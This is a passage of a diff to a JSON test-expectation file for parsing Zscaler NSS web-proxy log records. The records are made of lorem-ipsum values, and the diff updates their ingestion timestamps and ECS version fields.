2018^^timezone=OMST^^action=Allowed^^reason=unknown^^hostname=agna5654.www.corp^^protocol=tcp^^serverip=10.200.74.101^^url=https://example.com/nonproi/dolor.jpg?molli=oeiusm#aUtenim^^urlcategory=ntincul^^urlclass=nnumquam^^dlpdictionaries=etdol^^dlpengine=sed^^filetype=uep^^threatcategory=ametco^^threatclass=nde^^pagerisk=reprehe^^threatname=umdolo^^clientpublicIP=duntutl^^ClientIP=10.203.47.23^^location=empor^^refererURL=https://mail.example.net/teveli/utperspi.html?luptate=aturvel#ostrumex^^useragent=Mozilla/5.0 (Linux; Android 10; SM-A305FN Build/QP1A.190711.020; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/78.0.3904.96 Mobile Safari/537.36 YandexSearch/8.10 YandexSearchBrowser/8.10^^department=sedquia^^user=litesse^^event_id=ntmo^^clienttranstime=aliqu^^requestmethod=iqu^^requestsize=4429^^requestversion=ationula^^status=doconse^^responsesize=4822^^responseversion=oreeufug^^transactionsize=5020", "event": { - "ingested": "2021-06-14T08:26:19.845158400Z" + "ingested": "2021-12-14T14:59:54.590748599Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "tenima ZSCALERNSS: time=emagnam Dec 7 4:17:40 2018^^timezone=CT^^action=Blocked^^reason=success^^hostname=ites5711.internal.host^^protocol=ggp^^serverip=10.162.78.48^^url=https://example.com/sedqui/iuntNe.gif?epteu=nvent#uepor^^urlcategory=umSecti^^urlclass=eabil^^dlpdictionaries=ibusB^^dlpengine=rporis^^filetype=etco^^threatcategory=mip^^threatclass=ereprehe^^pagerisk=olu^^threatname=nofdeF^^clientpublicIP=riaturEx^^ClientIP=10.24.23.209^^location=itautfu^^refererURL=https://internal.example.org/ole/odi.txt?mporain=ectetur#adipisc^^useragent=Mozilla/5.0 (Linux; Android 9; U307AS) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.83 Mobile Safari/537.36^^department=iumd^^user=ntore^^event_id=tect^^clienttranstime=ion^^requestmethod=tutl^^requestsize=3811^^requestversion=bor^^status=ameaquei^^responsesize=4147^^responseversion=uelaud^^transactionsize=1306", "event": { - "ingested": "2021-06-14T08:26:19.845162900Z" + "ingested": "2021-12-14T14:59:54.590749050Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "ngelit ZSCALERNSS: time=quiano Dec 21 11:20:14 2018^^timezone=GMT+02:00^^action=Allowed^^reason=success^^hostname=oluptat2848.api.home^^protocol=igmp^^serverip=10.55.151.53^^url=https://www5.example.net/lits/Nemoen.txt?elillu=seruntmo#imidest^^urlcategory=oeiusmod^^urlclass=uidolore^^dlpdictionaries=iacon^^dlpengine=ncu^^filetype=quaturve^^threatcategory=ciad^^threatclass=diconseq^^pagerisk=utod^^threatname=ostr^^clientpublicIP=amcorp^^ClientIP=10.211.66.68^^location=uptatem^^refererURL=https://mail.example.org/nproide/mali.htm?siutali=mfugi#ceroinBC^^useragent=Mozilla/5.0 (Linux; Android 9; G8142) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.83 Mobile Safari/537.36^^department=maveni^^user=squir^^event_id=commod^^clienttranstime=umqu^^requestmethod=umet^^requestsize=5891^^requestversion=amestqu^^status=aliqua^^responsesize=1782^^responseversion=teirure^^transactionsize=1210", "event": { - "ingested": "2021-06-14T08:26:19.845167500Z" + "ingested": "2021-12-14T14:59:54.590749563Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "dipisciv ZSCALERNSS: time=nsequun Jan 5 6:22:49 2019^^timezone=ET^^action=Blocked^^reason=unknown^^hostname=ngelitse7535.internal.lan^^protocol=rdp^^serverip=10.110.16.169^^url=https://example.org/eius/evo.jpg?iarchit=volupt#ipis^^urlcategory=usBonor^^urlclass=mide^^dlpdictionaries=sten^^dlpengine=enderi^^filetype=labore^^threatcategory=uasiarch^^threatclass=iamquisn^^pagerisk=magnama^^threatname=reprehe^^clientpublicIP=citatio^^ClientIP=10.209.203.156^^location=esciunt^^refererURL=https://www.example.com/liquide/BCSedut.htm?litani=temse#samvo^^useragent=Mozilla/5.0 (Linux; Android 9; G8142) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.83 Mobile Safari/537.36^^department=roinBCSe^^user=mes^^event_id=labori^^clienttranstime=ditau^^requestmethod=lupta^^requestsize=6650^^requestversion=tam^^status=olu^^responsesize=409^^responseversion=iut^^transactionsize=3808", "event": { - "ingested": "2021-06-14T08:26:19.845172500Z" + "ingested": "2021-12-14T14:59:54.590750003Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "deser ZSCALERNSS: time=boris Jan 19 1:25:23 2019^^timezone=PST^^action=Allowed^^reason=success^^hostname=tiumtot3611.internal.localdomain^^protocol=udp^^serverip=10.84.9.150^^url=https://www5.example.net/equun/veli.gif?tem=iadeseru#uiineavo^^urlcategory=enimadmi^^urlclass=qui^^dlpdictionaries=ita^^dlpengine=lamco^^filetype=natuser^^threatcategory=Excepteu^^threatclass=omnis^^pagerisk=tati^^threatname=orinc^^clientpublicIP=teursi^^ClientIP=10.107.68.114^^location=nofdeFin^^refererURL=https://internal.example.org/ollit/umfug.htm?lumquid=Sectio#tiumdol^^useragent=Mozilla/5.0 (Linux; Android 9; LG-US998) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.83 Mobile Safari/537.36^^department=ocons^^user=sequatDu^^event_id=nsecte^^clienttranstime=pta^^requestmethod=uianonnu^^requestsize=5724^^requestversion=veleumi^^status=volupt^^responsesize=6822^^responseversion=itatise^^transactionsize=3714", "event": { - "ingested": "2021-06-14T08:26:19.845177300Z" + "ingested": "2021-12-14T14:59:54.590750392Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "userro ZSCALERNSS: time=oree Feb 2 8:27:57 2019^^timezone=CEST^^action=Blocked^^reason=failure^^hostname=gnaa4656.api.example^^protocol=igmp^^serverip=10.26.222.144^^url=https://internal.example.com/ecatcu/tMalo.txt?nse=rauto#rese^^urlcategory=nonproi^^urlclass=doconse^^dlpdictionaries=henderi^^dlpengine=tisunde^^filetype=ende^^threatcategory=quidolor^^threatclass=lloin^^pagerisk=eomnis^^threatname=proiden^^clientpublicIP=moenimip^^ClientIP=10.124.119.48^^location=atquo^^refererURL=https://www.example.com/ern/ationula.jpg?nsequun=ateveli#aqua^^useragent=Mozilla/5.0 (Linux; Android 10; SM-A305FN Build/QP1A.190711.020; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/78.0.3904.96 Mobile Safari/537.36 YandexSearch/8.10 YandexSearchBrowser/8.10^^department=amn^^user=nre^^event_id=sintoc^^clienttranstime=rinci^^requestmethod=ici^^requestsize=7328^^requestversion=Nequepor^^status=aUten^^responsesize=4127^^responseversion=tatnon^^transactionsize=977", "event": { - "ingested": "2021-06-14T08:26:19.845181900Z" + "ingested": "2021-12-14T14:59:54.590750889Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "mnisis ZSCALERNSS: time=onsequa Feb 17 3:30:32 2019^^timezone=GMT+02:00^^action=Allowed^^reason=failure^^hostname=psaqu6066.www5.localhost^^protocol=ipv6-icmp^^serverip=10.164.190.2^^url=https://mail.example.org/ntutlabo/leumiure.htm?eacommo=amqua#tionevol^^urlcategory=itvo^^urlclass=asi^^dlpdictionaries=tobe^^dlpengine=ssequa^^filetype=emp^^threatcategory=emoeni^^threatclass=officiad^^pagerisk=veniam^^threatname=labo^^clientpublicIP=ssecill^^ClientIP=10.223.11.164^^location=tate^^refererURL=https://internal.example.net/ali/ionu.txt?cte=ariatu#ess^^useragent=Mozilla/5.0 (Linux; Android 10; LM-V350) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.83 Mobile Safari/537.36^^department=risnisiu^^user=ten^^event_id=datatno^^clienttranstime=equepor^^requestmethod=antium^^requestsize=5241^^requestversion=texp^^status=mvolup^^responsesize=4382^^responseversion=ema^^transactionsize=6673", "event": { - "ingested": "2021-06-14T08:26:19.845186700Z" + "ingested": "2021-12-14T14:59:54.590751283Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "nsec ZSCALERNSS: time=iaeco Mar 3 10:33:06 2019^^timezone=OMST^^action=Blocked^^reason=failure^^hostname=iavol5202.api.example^^protocol=udp^^serverip=10.14.37.8^^url=https://www.example.org/ugitsed/ritatis.jpg?xplic=stenat#mquis^^urlcategory=rume^^urlclass=samnisiu^^dlpdictionaries=yCiceroi^^dlpengine=evolupta^^filetype=citat^^threatcategory=prehende^^threatclass=vitaedic^^pagerisk=remip^^threatname=rsita^^clientpublicIP=rehe^^ClientIP=10.121.181.243^^location=midest^^refererURL=https://example.org/olupta/modi.txt?rnatur=tseddo#utaliq^^useragent=Mozilla/5.0 (Linux; Android 6.0; Lenovo A2016a40 Build/MRA58K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/48.0.2564.106 Mobile Safari/537.36 YaApp_Android/10.30 YaSearchBrowser/10.30^^department=errorsi^^user=umwr^^event_id=olor^^clienttranstime=cupida^^requestmethod=rinc^^requestsize=7719^^requestversion=roqu^^status=dquia^^responsesize=1460^^responseversion=strude^^transactionsize=6667", "event": { - "ingested": "2021-06-14T08:26:19.845191500Z" + "ingested": "2021-12-14T14:59:54.590751689Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "ptate ZSCALERNSS: time=oloreeu Mar 17 5:35:40 2019^^timezone=ET^^action=Blocked^^reason=success^^hostname=uame1361.api.local^^protocol=udp^^serverip=10.90.20.202^^url=https://mail.example.com/aute/dictasu.gif?ptas=iadolo#cidu^^urlcategory=nonp^^urlclass=abillo^^dlpdictionaries=tinv^^dlpengine=iar^^filetype=nse^^threatcategory=turQuis^^threatclass=tat^^pagerisk=pta^^threatname=henderi^^clientpublicIP=onsec^^ClientIP=10.10.93.133^^location=tau^^refererURL=https://www.example.net/urad/upt.gif?sitamet=xerc#mcolabor^^useragent=Mozilla/5.0 (Linux; Android 9; ZTE Blade V1000RU Build/PPR1.180610.011) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.138 Mobile Safari/537.36 YaApp_Android/10.91 YaSearchBrowser/10.91^^department=quipe^^user=evita^^event_id=ostrude^^clienttranstime=itsed^^requestmethod=nia^^requestsize=7548^^requestversion=rehe^^status=eseosqu^^responsesize=3488^^responseversion=sundeo^^transactionsize=3076", "event": { - "ingested": "2021-06-14T08:26:19.845196100Z" + "ingested": "2021-12-14T14:59:54.590752076Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "laud ZSCALERNSS: time=uido Apr 1 12:38:14 2019^^timezone=ET^^action=Allowed^^reason=success^^hostname=rsitame4049.internal.corp^^protocol=tcp^^serverip=10.34.98.144^^url=https://mail.example.net/enbyCic/aturau.gif?orroqui=sci#psamvolu^^urlcategory=itsedqui^^urlclass=oreve^^dlpdictionaries=omn^^dlpengine=onevol^^filetype=ese^^threatcategory=reprehen^^threatclass=Exce^^pagerisk=tocca^^threatname=tinvolu^^clientpublicIP=ecatc^^ClientIP=10.77.102.206^^location=quin^^refererURL=https://api.example.com/sedqui/ueporroq.htm?eetdol=tia#lup^^useragent=Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.122 YaBrowser/20.3.0.2221 Yowser/2.5 Safari/537.36^^department=inBCSed^^user=tectobe^^event_id=pariatu^^clienttranstime=uiacons^^requestmethod=ulapa^^requestsize=4143^^requestversion=henderit^^status=ident^^responsesize=4610^^responseversion=mquae^^transactionsize=1789", "event": { - "ingested": "2021-06-14T08:26:19.845200600Z" + "ingested": "2021-12-14T14:59:54.590753266Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "lit ZSCALERNSS: time=uiine Apr 15 7:40:49 2019^^timezone=ET^^action=Blocked^^reason=unknown^^hostname=elit912.www5.test^^protocol=udp^^serverip=10.176.233.249^^url=https://example.org/olu/mqua.txt?mdolore=ita#aeratvol^^urlcategory=odite^^urlclass=atn^^dlpdictionaries=sectet^^dlpengine=boreetd^^filetype=ueporro^^threatcategory=cto^^threatclass=essequa^^pagerisk=gnidolor^^threatname=itlabori^^clientpublicIP=amestqui^^ClientIP=10.75.144.118^^location=qua^^refererURL=https://api.example.com/pteurs/intocc.gif?veni=turmag#dutper^^useragent=Mozilla/5.0 (Linux; Android 8.0.0; VS996) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.83 Mobile Safari/537.36^^department=aconseq^^user=isnos^^event_id=ntin^^clienttranstime=tenatus^^requestmethod=odic^^requestsize=3588^^requestversion=intocca^^status=equuntu^^responsesize=3976^^responseversion=ine^^transactionsize=3409", "event": { - "ingested": "2021-06-14T08:26:19.845205300Z" + "ingested": "2021-12-14T14:59:54.590753804Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "rcit ZSCALERNSS: time=secte Apr 29 2:43:23 2019^^timezone=GMT-07:00^^action=Allowed^^reason=unknown^^hostname=tat6671.www.local^^protocol=udp^^serverip=10.149.6.107^^url=https://api.example.net/mnisiut/eabil.jpg?psumqui=trude#ccusa^^urlcategory=ndeomni^^urlclass=chite^^dlpdictionaries=obeatae^^dlpengine=rehen^^filetype=uam^^threatcategory=vitaedi^^threatclass=uis^^pagerisk=emagnaal^^threatname=uunturm^^clientpublicIP=nonnumq^^ClientIP=10.236.55.236^^location=aerat^^refererURL=https://www.example.org/eata/maliquam.jpg?gnamali=olabor#ionem^^useragent=Mozilla/5.0 (Linux; Android 10; LM-V350) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.83 Mobile Safari/537.36^^department=eseosqu^^user=redolo^^event_id=mveleu^^clienttranstime=cillumdo^^requestmethod=mvele^^requestsize=4686^^requestversion=isnost^^status=lumdolor^^responsesize=559^^responseversion=aspe^^transactionsize=4318", "event": { - "ingested": "2021-06-14T08:26:19.845209500Z" + "ingested": "2021-12-14T14:59:54.590754196Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "erita ZSCALERNSS: time=eursint May 13 9:45:57 2019^^timezone=CET^^action=Blocked^^reason=failure^^hostname=uis5050.www.local^^protocol=igmp^^serverip=10.97.202.149^^url=https://api.example.net/uamestq/eetdol.html?ctionofd=uianonnu#ntNeque^^urlcategory=magnidol^^urlclass=meumfug^^dlpdictionaries=irat^^dlpengine=uatu^^filetype=gel^^threatcategory=modt^^threatclass=atcupi^^pagerisk=xeacomm^^threatname=tla^^clientpublicIP=itaspe^^ClientIP=10.13.125.101^^location=uisautei^^refererURL=https://mail.example.net/ihilmol/scinge.jpg?str=yCiceroi#loremeu^^useragent=Mozilla/5.0 (Linux; Android 4.1.2; Micromax P410i Build/JZO54K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/63.0.3239.111 Mobile Safari/537.36^^department=velitess^^user=colab^^event_id=itte^^clienttranstime=niamquis^^requestmethod=uaUten^^requestsize=7772^^requestversion=exeacomm^^status=uptat^^responsesize=982^^responseversion=ore^^transactionsize=7330", "event": { - "ingested": "2021-06-14T08:26:19.845214Z" + "ingested": "2021-12-14T14:59:54.590754587Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "poriss ZSCALERNSS: time=enatus May 28 4:48:31 2019^^timezone=GMT+02:00^^action=Blocked^^reason=failure^^hostname=ficiad1312.api.host^^protocol=igmp^^serverip=10.141.66.163^^url=https://mail.example.net/ius/msequ.jpg?ptat=tionula#gnido^^urlcategory=usmo^^urlclass=squirati^^dlpdictionaries=uasi^^dlpengine=quaeabi^^filetype=sequ^^threatcategory=gna^^threatclass=itautf^^pagerisk=aev^^threatname=uovolup^^clientpublicIP=tMaloru^^ClientIP=10.230.61.102^^location=rautod^^refererURL=https://example.net/minimav/uovo.html?orinrep=tNequ#eca^^useragent=Mozilla/5.0 (Linux; Android 6.0; ZTE BLADE V7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.83 Mobile Safari/537.36^^department=serr^^user=umdolo^^event_id=iduntut^^clienttranstime=admini^^requestmethod=mini^^requestsize=3181^^requestversion=cididun^^status=iamqu^^responsesize=1324^^responseversion=iunt^^transactionsize=2218", "event": { - "ingested": "2021-06-14T08:26:19.845219400Z" + "ingested": "2021-12-14T14:59:54.590754984Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "uisaut ZSCALERNSS: time=apar Jun 11 11:51:06 2019^^timezone=OMST^^action=Blocked^^reason=unknown^^hostname=itaspe921.mail.invalid^^protocol=tcp^^serverip=10.10.25.145^^url=https://www.example.org/iat/acom.html?umdolo=oluptass#umqu^^urlcategory=rsitam^^urlclass=aliqui^^dlpdictionaries=uipexea^^dlpengine=sauteiru^^filetype=nibusB^^threatcategory=eetdolo^^threatclass=issuscip^^pagerisk=iduntu^^threatname=nde^^clientpublicIP=naturau^^ClientIP=10.224.249.228^^location=odit^^refererURL=https://www5.example.net/lapa/enia.jpg?deserun=ugia#isiuta^^useragent=Mozilla/5.0 (Linux; Android 10; LM-V350) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.83 Mobile Safari/537.36^^department=ugiatq^^user=mnisiuta^^event_id=nrepre^^clienttranstime=eumfu^^requestmethod=remap^^requestsize=1954^^requestversion=yCicero^^status=dqui^^responsesize=6666^^responseversion=oin^^transactionsize=3838", "event": { - "ingested": "2021-06-14T08:26:19.845224500Z" + "ingested": "2021-12-14T14:59:54.590755580Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "eiusm ZSCALERNSS: time=assit Jun 25 6:53:40 2019^^timezone=PT^^action=Blocked^^reason=unknown^^hostname=archite4407.mail.invalid^^protocol=ipv6-icmp^^serverip=10.234.34.40^^url=https://www.example.com/onorum/umiure.gif?lites=admini#trumexer^^urlcategory=maveniam^^urlclass=ctobeat^^dlpdictionaries=emoenim^^dlpengine=oqui^^filetype=olab^^threatcategory=remagnam^^threatclass=neavolu^^pagerisk=adipi^^threatname=idid^^clientpublicIP=ela^^ClientIP=10.247.255.107^^location=lore^^refererURL=https://www5.example.org/olorsi/everitat.htm?iamq=ercitat#velillu^^useragent=Mozilla/5.0 (Linux; Android 9; Notepad_K10) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.83 Safari/537.36^^department=elitsed^^user=aeabillo^^event_id=dolori^^clienttranstime=mco^^requestmethod=nofdeF^^requestsize=245^^requestversion=writt^^status=ent^^responsesize=3750^^responseversion=uaer^^transactionsize=2304", "event": { - "ingested": "2021-06-14T08:26:19.845229Z" + "ingested": "2021-12-14T14:59:54.590755964Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "tectobe ZSCALERNSS: time=ain Jul 10 1:56:14 2019^^timezone=OMST^^action=Blocked^^reason=success^^hostname=aria1424.mail.home^^protocol=igmp^^serverip=10.124.81.20^^url=https://mail.example.org/veni/rspi.htm?ntium=imadmi#dquiac^^urlcategory=liquide^^urlclass=uatD^^dlpdictionaries=reh^^dlpengine=uel^^filetype=tmollit^^threatcategory=ametco^^threatclass=ilmoles^^pagerisk=xeaco^^threatname=texpl^^clientpublicIP=tqua^^ClientIP=10.250.102.42^^location=totamr^^refererURL=https://internal.example.com/iciat/uira.htm?cti=orsitvo#elit^^useragent=Mozilla/5.0 (Linux; Android 9; Pixel 3 Build/PD1A.180720.030) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/66.0.3359.158 Mobile Safari/537.36^^department=tenby^^user=tNequ^^event_id=piciatis^^clienttranstime=ritten^^requestmethod=tatisetq^^requestsize=2753^^requestversion=madmi^^status=icia^^responsesize=412^^responseversion=eroi^^transactionsize=2077", "event": { - "ingested": "2021-06-14T08:26:19.845233600Z" + "ingested": "2021-12-14T14:59:54.590756351Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "riatur ZSCALERNSS: time=amrema Jul 24 8:58:48 2019^^timezone=OMST^^action=Allowed^^reason=unknown^^hostname=Bonoru7444.www5.example^^protocol=rdp^^serverip=10.166.205.159^^url=https://www.example.com/tem/litsedq.htm?ium=utfugit#beat^^urlcategory=odita^^urlclass=borisn^^dlpdictionaries=itanimid^^dlpengine=ianonnum^^filetype=cte^^threatcategory=iratio^^threatclass=proid^^pagerisk=inculp^^threatname=atnu^^clientpublicIP=ntmo^^ClientIP=10.154.188.132^^location=atevelit^^refererURL=https://internal.example.com/iconsequ/adipisci.txt?gnido=iamq#Utenim^^useragent=Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) yahoo.adquality.lwd.desktop/1591143192-10^^department=uisa^^user=uptat^^event_id=siutal^^clienttranstime=umetMalo^^requestmethod=onevolu^^requestsize=4181^^requestversion=sedquian^^status=involu^^responsesize=5294^^responseversion=nsequatD^^transactionsize=7089", "event": { - "ingested": "2021-06-14T08:26:19.845238Z" + "ingested": "2021-12-14T14:59:54.590756735Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "liquid ZSCALERNSS: time=uamq Aug 7 4:01:23 2019^^timezone=CEST^^action=Allowed^^reason=success^^hostname=icero1297.internal.domain^^protocol=ipv6-icmp^^serverip=10.46.71.46^^url=https://www.example.com/amcola/eumiurer.gif?stiaeco=equu#laborisn^^urlcategory=atisetq^^urlclass=mSectio^^dlpdictionaries=rsinto^^dlpengine=nonnumqu^^filetype=atis^^threatcategory=todit^^threatclass=upta^^pagerisk=fug^^threatname=ulpaq^^clientpublicIP=rured^^ClientIP=10.138.193.38^^location=udex^^refererURL=https://api.example.com/uin/isci.htm?nsectetu=spici#untutl^^useragent=Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) yahoo.adquality.lwd.desktop/1591143192-10^^department=tate^^user=sintocca^^event_id=ugiat^^clienttranstime=asuntex^^requestmethod=uovolup^^requestsize=745^^requestversion=amali^^status=uiav^^responsesize=274^^responseversion=mullamco^^transactionsize=7843", "event": { - "ingested": "2021-06-14T08:26:19.845242200Z" + "ingested": "2021-12-14T14:59:54.590757130Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "ons ZSCALERNSS: time=radip Aug 21 11:03:57 2019^^timezone=CT^^action=Blocked^^reason=unknown^^hostname=oloremeu5047.www5.invalid^^protocol=tcp^^serverip=10.254.119.31^^url=https://api.example.net/sedquian/lamcorpo.html?sequatD=Nequepo#veleum^^urlcategory=eturad^^urlclass=tor^^dlpdictionaries=hender^^dlpengine=moditemp^^filetype=pitlab^^threatcategory=tutlabor^^threatclass=imadmi^^pagerisk=nculp^^threatname=quamnihi^^clientpublicIP=nimadmi^^ClientIP=10.172.159.251^^location=nima^^refererURL=https://mail.example.org/tur/tlaboru.htm?tutlabo=incid#der^^useragent=Mozilla/5.0 (Linux; Android 6.0; U20 Build/MRA58K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.147 Mobile Safari/537.36 YaApp_Android/10.90 YaSearchBrowser/10.90^^department=tconsect^^user=usm^^event_id=uunturma^^clienttranstime=namaliqu^^requestmethod=tatemacc^^requestsize=2324^^requestversion=nor^^status=saut^^responsesize=2804^^responseversion=stiaeco^^transactionsize=1508", "event": { - "ingested": "2021-06-14T08:26:19.845246200Z" + "ingested": "2021-12-14T14:59:54.590757591Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "osam ZSCALERNSS: time=ncid Sep 5 6:06:31 2019^^timezone=PT^^action=Allowed^^reason=unknown^^hostname=edutpe1255.internal.lan^^protocol=ipv6-icmp^^serverip=10.195.62.230^^url=https://www5.example.com/ictasun/iumto.txt?erro=admin#uisnostr^^urlcategory=nemul^^urlclass=amqua^^dlpdictionaries=isnost^^dlpengine=eaco^^filetype=oremeu^^threatcategory=uis^^threatclass=isnost^^pagerisk=itvolu^^threatname=citation^^clientpublicIP=spernatu^^ClientIP=10.98.126.206^^location=tion^^refererURL=https://internal.example.org/uidolore/uatDuisa.htm?uipe=alo#ufugia^^useragent=Mozilla/5.0 (Linux; Android 10; SM-A715F Build/QP1A.190711.020; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/83.0.4103.83 Mobile Safari/537.36 [FB_IAB/Orca-Android;FBAV/266.0.0.16.117;]^^department=atatnonp^^user=ptassit^^event_id=sequat^^clienttranstime=Uteni^^requestmethod=oriosa^^requestsize=7244^^requestversion=temporai^^status=totamrem^^responsesize=4957^^responseversion=dminimve^^transactionsize=1182", "event": { - "ingested": "2021-06-14T08:26:19.845250300Z" + "ingested": "2021-12-14T14:59:54.590757983Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "idolo ZSCALERNSS: time=citat Sep 19 1:09:05 2019^^timezone=PT^^action=Blocked^^reason=unknown^^hostname=nderit1171.www5.domain^^protocol=rdp^^serverip=10.144.93.186^^url=https://www5.example.org/oriosa/ssusc.htm?atemacc=rsitvolu#isi^^urlcategory=umquia^^urlclass=evolu^^dlpdictionaries=quidolo^^dlpengine=utlabore^^filetype=texplica^^threatcategory=boru^^threatclass=ntut^^pagerisk=elaud^^threatname=acomm^^clientpublicIP=edquia^^ClientIP=10.84.140.5^^location=laboris^^refererURL=https://www.example.org/lpaquiof/isisten.txt?culp=Ciceroin#aeco^^useragent=Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.122 YaBrowser/20.3.0.2221 Yowser/2.5 Safari/537.36^^department=mull^^user=eroi^^event_id=adminim^^clienttranstime=naturau^^requestmethod=nima^^requestsize=4943^^requestversion=sed^^status=mUten^^responsesize=6658^^responseversion=tfugitse^^transactionsize=6480", "event": { - "ingested": "2021-06-14T08:26:19.845254300Z" + "ingested": "2021-12-14T14:59:54.590758385Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "uianon ZSCALERNSS: time=iutal Oct 3 8:11:40 2019^^timezone=ET^^action=Allowed^^reason=success^^hostname=nos4114.api.lan^^protocol=rdp^^serverip=10.31.58.6^^url=https://mail.example.net/tseddoei/byCi.gif?assitas=nul#ame^^urlcategory=lites^^urlclass=sec^^dlpdictionaries=aqua^^dlpengine=meumf^^filetype=olu^^threatcategory=ectet^^threatclass=tquovo^^pagerisk=orev^^threatname=lapa^^clientpublicIP=xeacom^^ClientIP=10.198.84.190^^location=henderi^^refererURL=https://mail.example.com/dminim/sse.gif?equ=turvelil#lor^^useragent=Mozilla/5.0 (Linux; Android 5.1.1; Android Build/LMY47V) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.138 Mobile Safari/537.36 YaApp_Android/9.80 YaSearchBrowser/9.80^^department=ern^^user=unt^^event_id=volu^^clienttranstime=iineavo^^requestmethod=qua^^requestsize=6831^^requestversion=tenbyC^^status=xeacomm^^responsesize=6855^^responseversion=psu^^transactionsize=5856", "event": { - "ingested": "2021-06-14T08:26:19.845258400Z" + "ingested": "2021-12-14T14:59:54.590758778Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "ept ZSCALERNSS: time=nem Oct 18 3:14:14 2019^^timezone=ET^^action=Allowed^^reason=unknown^^hostname=oremeum4231.internal.host^^protocol=ipv6^^serverip=10.139.90.218^^url=https://www5.example.org/liquipe/rehe.gif?niamqu=uioffi#suntin^^urlcategory=consequa^^urlclass=tionu^^dlpdictionaries=umqua^^dlpengine=ommod^^filetype=ione^^threatcategory=mnihi^^threatclass=rrorsi^^pagerisk=icons^^threatname=voluptat^^clientpublicIP=volu^^ClientIP=10.131.81.172^^location=llamcor^^refererURL=https://mail.example.com/veri/run.txt?enimadm=empo#apa^^useragent=Mozilla/5.0 (Linux; U; Android 4.0.3; es-us; GT-P3100 Build/IML74K) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Safari/534.30^^department=icons^^user=hende^^event_id=umdol^^clienttranstime=Sedutper^^requestmethod=exe^^requestsize=6188^^requestversion=preh^^status=dol^^responsesize=3128^^responseversion=gnamal^^transactionsize=6119", "event": { - "ingested": 